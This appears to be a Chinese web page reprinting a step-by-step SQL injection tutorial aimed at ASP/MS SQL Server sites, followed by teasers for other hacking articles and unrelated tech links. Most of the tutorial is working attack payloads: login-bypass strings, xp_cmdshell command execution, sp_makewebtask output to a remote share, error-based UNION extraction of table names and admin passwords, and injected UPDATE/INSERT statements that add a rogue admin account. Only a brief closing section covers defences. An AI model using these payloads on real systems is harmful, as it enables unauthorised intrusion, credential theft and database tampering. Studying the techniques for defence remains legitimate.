sql注入的作用 如何避免SQL注入?
本文详细讲述了 sql注入的原理及防范技巧,目的是让初学者利用SQL注入技术来解决他们面临的问题, 成功的使用它们,并在这种攻击中保护自己。希望能对大家有所帮助。
一、 介绍
当一台机器只打开了80端口, 你最依赖的漏洞扫描器也不能返回任何有用的内容, 并且你知道管理员经常为机器打补丁, 我们就不得不使用web攻击方式了. SQL注入是web攻击的一种类型 ,这种方式只需要开放80端口就够了并且即使管理员打了全部的补丁也能工作. 它攻击的目标是web程序(像ASP,JSP,PHP,CGI等)本身而不是web服务器或系统上运行的服务.
本文不介绍任何新的东西, SQL注入已经被广泛的讨论和使用. 我们写这篇文章目的是因为我们想要使用SQL注入进行一些演练测试,希望这个能对各位有用. 你可以在这里找到一两个窍门但是请你关注下"9.0 哪里有更多的信息?" 可以得到关于SQL注入更多,更深入的技术.
1.什么是SQL注入:
通过网页的输入项来注入SQL查询或命令是一种技巧。许多网页会从用户那里获取参数,并构建SQL查询来访问数据库。以用户登录为例,页面收集用户名和密码然后构建SQL去查询数据库,来校验用户名和密码的有效性。通过SQL注入,我们可以发送经过精心编造的用户名和/或密码字段,来改变SQL查询语句并赋予 我们其它一些权限。
2.你需要什么:
任意web浏览器。
二、 你应该寻找什么
尝试寻找那些允许你提交数据的页面,即: 登录页面,查询页面,反馈信息等等。有时,HTML页面会用POST命令来把参数发送到另外一个ASP页面上去。那么,你可能在URL中看不到参数。不过,你可以查看页面的HTML源代码,查找"FORM"标签。你会在一些HTML源代码中看到类似下面的东东:
复制代码
代码如下:
位于
之间的所有内容都可能暗含着有用的参数(利用你的智慧)。
2.1 如果你找不到任何带有输入框的页面怎么办?
你应该寻找诸如ASP, JSP, CGI, 或 PHP这样的页面。尤其要找那些携带有参数的 URL,比如:
复制代码
代码如下:
http://XXX/index.asp?id=10
三、如何测试它是否是易受攻击的
1.从一个单引号技巧开始。输入类似这样的内容:
复制代码
代码如下:
hi' or 1=1--
到登录页面中,或者密码中,甚至直接在URL中。例如:
复制代码
代码如下:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://XXX/index.asp?id=hi' or 1=1--
假如你必须在一个hidden字段中来这样做,就把HTML源代码下载下来,保存到硬盘上,修改URL和相应的 hidden字段。例如:
复制代码
代码如下:
如果够幸运,不需要任何用户名和密码你就可以登录。
2.为什么是 ' or 1=1--
让我们通过另外一个例子来展示' or 1=1-- 的重要性。除了能绕过“登录”验证,它还能展示一些在正常情况下很难看到的额外信息。假设,有一个ASP页面,其功能是将我们导航到下面的URL:
复制代码
代码如下:
http://XXX/index.asp?category=food
在URL中,'category'是变量名;food是赋给变量的值。为了完成导航功能,我们猜想ASP页面应该包含下面的代码(这些代码是我们为了完成此测试而编写的真实代码):
复制代码
代码如下:
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
如上所示,变量v_cat获取了参数category的值,SQL语句将变成:
复制代码
代码如下:
SELECT * FROM product WHERE PCategory='food'
该SQL语句将返回符合where条件的的结果集。在本例中,where条件是PCategory='food' 。
下面,假设我们将URL改成下面的形式:
复制代码
代码如下:
http://XXX/index.asp?category=food' or 1=1--
现在,变量v_cat等于"food' or 1=1-- "。将变量v_cat在SQL中进行替换,我们将得到下面语句:
复制代码
代码如下:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
该语句将得到product表中所有记录,无论PCategory是否等于'food'。“--”告诉MS SQL server忽略其后面的所有内容(笔者注:其实可以理解为注释,“--”后面所有的内容都为注释),方便我们处理单引号。在某些情况下,"--"可以被替换成”#“。
如果后台的数据库不是SQL Server,查询语句的单引号就不能被忽略。在这种情况下,我们可以尝试下面的查询条件:
复制代码
代码如下:
' or 'a'='a
此时,SQL语句将变成:
复制代码
代码如下:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
根据真实的SQL语句,我们还可以尝试以下各种变形:
复制代码
代码如下:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
四、如何通过SQL注入来进行远程执行
能够注入SQL命名通常意味着我们可以随意执行任何SQL查询。默认安装的MS SQL 服务是作为SYSTEM来运行的, 它相当于 Windows系统中的Administrator。我们可以利用存储过程,比如master..xp_cmdshell 来进行远程执行:
复制代码
代码如下:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
如果单引号(')不管用,可以试试双引号 (")。
分号会终止当前的SQL查询,这就允许你开始一个新的SQL命名。要验证命令是否执行成功,你需要监听来自10.10.1.2的 ICMP数据包,检查是否收到来自服务器的数据包:
复制代码
代码如下:
#tcpdump icmp
如果你没有收到任何来自服务器的ping请求,并且收到了暗示许可错误的信息,则有可能是管理员限制了Web用户对存储过程的访问。
五、如何获取SQL查询的输出
可以通过使用sp_makewebtask把你的查询写入到HTML:
复制代码
代码如下:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
注意这个目标IP的文件夹"share"的共享权限是Everyone.
六、如何从数据库的ODBC错误消息中获取数据
我们几乎可以在MS SQL服务器产生的错误消息中得到任何我们想要的数据. 通过类似下面的这个地址:
复制代码
代码如下:
http://XXX/index.asp?id=10
我们将试图把这个整数'10'和另外的字符串进行UNION联合操作:
复制代码
代码如下:
http://XXX/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
系统表 INFORMATION_SCHEMA.TABLES 包含了服务器上所有表的信息. 这个TABLE_NAME 字段包含数据库中每个表的字段. 这样就不存在无此表无此字段的问题了. 看我们的查询语句:
复制代码
代码如下:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-
这个语句将会返回数据库中第一个表的名字. 当我们使用这个字符串值和一个数字'10'进行UNION操作, MS SQL 服务器将会试图转换这个字符串(nvarchar)为一个数字. 这会产生一个错误, 因为我们不能把nvarchar类型转换成数字. 服务器将会产生以下错误信息:
复制代码
代码如下:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
这个错误消息清楚的告诉我们这个值不能转换为数字. 同时呢,里面也包含了数据库中第一个表的名字 ,就是"table1".
想获取下一个表的名字,我们使用下面的语句:
复制代码
代码如下:
http://XXX/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--
我们也可以使用LIKE关键词来搜索数据:
复制代码
代码如下:
http://XXX/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--
输出:
复制代码
代码如下:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5
这个匹配, '%25login%25' 的结果和 %login% 是一样的在SQL Server服务器中.这样,我们将得到 匹配的第一个表的名字, "admin_login".
1.如何挖掘到表所有列的名称
我们可以使用另一个非常有用的表INFORMATION_SCHEMA.COLUMNS 来标出某一个的表所有列名:
复制代码
代码如下:
http://XXX/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
输出:
复制代码
代码如下:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5
注意错误提示,里面已经包含了第一个列名, 下面我们使用NOT IN ()来取得下一个列的名称:
复制代码
代码如下:
http://XXX/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--
输出:
复制代码
代码如下:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5
按上面的步骤继续下一个,我们就能获得剩下的所有列的名称, 即"password", "details"等列. 当我们得到下面的这个错误提示时,就表示我们已经找出所有的列名了.
复制代码
代码如下:
http://XXX/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--
输出:
复制代码
代码如下:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5
2.如何检索到我们想要的数据
现在我们已经确认了一些重要的表,以及它们的列名,我们可以用同样的技巧从数据库中挖掘任何我们想要的信息.
现在,让我们从这个"admin_login"表中得到第一个login_name的值吧:
复制代码
代码如下:
http://XXX/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
输出:
复制代码
代码如下:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5
根据上面的错误提示我们知道这里有一个管理员的登录名是"neo".下面,我们从数据库中到"neo"的密码:
复制代码
代码如下:
http://XXX/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5
密码就在错误提示里了,现在让我们用"neo"和密码"m4trix"登录试试吧.
3.如何获取数字型字符串的值
上面所述的技术具有局限性。在我们试图转换包含有效数字(即只是0-9之间的字符)的时候,我们没有得到任何错误信息。让我们试着获取"trinity"的密码"31173":
复制代码
代码如下:
http://XXX/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'
我们可能得到"此页面不存在“的错误。原因在于:在于整数(这时是10)联接之前,密码"31173"将转换为一个数字。由于这是一个有效地联接(UNION)语句,因此SQL Server不会抛出ODBC错误信息,因此我们将不能获取到任何数字型的项。
为了解决这个问题,我们给数字型字符串后面提交一些字母,这样可以确保转换失效。让我们看看下面这个查询:
复制代码
代码如下:
http://XXX/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'
我们只是给我们需要的密码文本后添加了加号(+)。(“+”的ASCII编码是0x2b)。我们将给真正的密码后添加“(空格)休眠符“。因此,即使我们有一个字符型字符串”31173“,它最终将变为”31173休眠符“。通过手工调用convert()函数试图把“31173休眠符“转换为整数时,SQL Server抛出ODBC错误信息:
复制代码
代码如下:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5
现在,你就可以使用密码为"31173"的"trinity"用户登陆了。
七、如何向数据库中更新或插入数据
当我们成功的获取到一张表的所有字段名后,我们就有可能UPDATE甚至INSERT一条新记录到该表中。例如,修改"neo"的密码:
复制代码
代码如下:
http://XXX/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--
下面INSERT一条新记录到数据库中:
复制代码
代码如下:
http://XXX/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--
现在我们可以用用户名"neo2"和密码"newpas5"来登录了。
八、如何避免SQL注入
过滤参数中的单引号、双引号、斜杠、反斜杠、分号等字符;以及NULL、回车符、换行符等扩展字符。这些参数可能来自于:
前台表单(form)中的用户输入
URL中的参数
cookie
对于数字,在将其传入SQL语句之前将其从字符串(String)转换成数字(Number);或者用ISNUMERIC函数确定其确实是数字。
将SQL Server的运行用户修改为低权限用户(low privilege user)。
删除不再需要的存储过程,例如:master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
如何进入数据库抓包备份数据?入侵网站备份数据的方法
这是我之前在绿色兵团时写的一篇文章,是我自己原创的,思路借鉴了一篇t00ls里的,进行了改进。我在绿色兵团的账号名字也是leisureforest真实性毋庸置疑,希望给过。thanks地址(仅用于替代目标网站,非本站)又是
详情2018-02-13 15:04:06责编:llp 来源:驱动管家ms08-052漏洞代码是什么?wmf漏洞如何修复?
由文件格式入手,来分析MS08-052漏洞, 并构造了一个可以使没有补丁的程序崩溃的图片,1 WMF文件结构--------------------------|文件头 |-------------------------|文件记录 |-------------------------|-----
详情2018-02-04 14:27:58责编:llp 来源:驱动管家adobe flash player9.0.124版具有修复什么漏洞的功能?
受影响系统:Adobe Flash Player < 9 0 115 0 不受影响系统:Adobe Flash Player 9 0 124 0 描述:Flash Player是一款非常流行的FLASH播放器。 Flash Player 9 0 124 0版本修复了多个安全漏洞,成功
详情2018-01-16 11:02:45责编:llp 来源:驱动管家网站挂马非iis映射修改且源代码没有iframe代码
(挂马现象:非IIS映射修改,非ARP病毒,且源代码里没有iframe代码的)今天访问公司的一个网站,突然发现网页显示不对,右键查看HTML代码,发现iframe了一个网站的js文件,不用说,肯定被挂马了。进入服务器,看了下
详情2018-01-29 19:35:14责编:llp 来源:驱动管家什么是rootKit?怎么用rootKit进行管理员高级隐藏?
Rootkit是一个或者多个用于隐藏、控制一台计算机的工具包,该技术被越来越多地应用于一些恶意软件中。在基于Windows的系统中Rootkit更多地用于隐藏程序或进程,系统被注入Rootkit后就可以在不为用户察觉的情况下
详情2018-01-27 17:13:03责编:llp 来源:驱动管家你知道流氓软件的代码是怎么样的吗?流氓软件的代码介绍
ps:请勿用于非法用途,仅供技术研究之用。by:yunshu这个东西的主要功能就是去网上一个URL读取配置文件,拿到需要弹出的窗口以及周期时间,然后开始弹……程序安装成服务,并设置为自动启动。启动之后写入一段代
详情2018-01-16 15:59:54责编:llp 来源:驱动管家游戏交易网怎么被入侵?游戏交易网的入侵方法
在这次入侵之前我已经拿到过一次这个网站的shell了,但是被删除了,由于不甘心又拿了一次,才有了下面的过程一: 踩点 收集信息因为这个已经是第二次入侵,所以具体的信息我已经基本上掌握服务器上13个站点,大多数站
详情2018-01-04 14:30:43责编:llp 来源:驱动管家大势至电脑文件防泄密系统安装时出现“用户密码错误”弹窗如何解决?
大势至电脑文件防泄密系统是一款保护电脑文件安全,防止员工随意将电脑文件外传的管理软件。系统分为两个版本,一个是单机版,适用于单机使用,另一个是网络版,适用于同一个局域网,可批量管理和修改用户电脑的
详情2018-01-30 09:29:15责编:llp 来源:驱动管家网站入侵有什么技巧?要先查看源文件
如果是html格式的站我们先打开网站,然后单击鼠标右键 按查看源文件-编辑-查找 ,输入asp 看有没有网站ASP文件或ASP带参数1:注入点先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾
详情2018-01-28 13:36:54责编:llp 来源:驱动管家adsl是什么意思?怎么穿透adsl路由入侵内网?
也许看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对ADSL MODEM的路由功能产生了浓厚的兴趣,经过一番努力,我终于找到了穿透ADSL路由入侵内网的方法,在这里和各位一起分享我的心得
详情2018-01-26 11:29:17责编:llp 来源:驱动管家
- 安装fedora9后没有声音?fedora9安装ALSA声卡的详细步骤
- 12306安装根证书的时候出现安装无响应等错误的解决办法
- 无线网络进行配置的时候要注意以下这些因素
- DIY电脑主机与显示器一体化 逆袭颠覆传统?
- 电脑的摄像头不能正常使用的原因有什么?怎么解决
- 小米MIX 2手机安卓8.0稳定版即将全面推送
- 美团打车将正式上线 同步登陆七个城市
- Office能不能关闭自动拼写检查和自动语法检查 怎么关闭
- cortana的工作原理是什么?怎么设置cortana搜索网络时不显示网络内容
- 360vizza装卡方法 360vizza安装sim卡的步骤
- tcl 么么哒基本参数 选tcl 么么哒还是红米1s?
- windows7怎么限制程序运行 win7限制程序运行的方法
- 电脑自动注销怎么办 解决电脑自动注销的办法
- McAfee框架服务有安全漏洞,可能导致服务崩溃
- dedecms 2007有什么漏洞?针对该漏洞的安全建议是什么?
- Win8装显卡驱动黑屏的解决方法
- 怎么直接取消火狐浏览器关闭多标签的时候的确认提示
- 复制caj文件的文字怎么操作避免转换成word格式
- 电脑显示器的屏幕怎么调节亮度?调节屏幕亮度的方法
- 双通道内存和单通道内存有什么区别?怎么安装双通道内存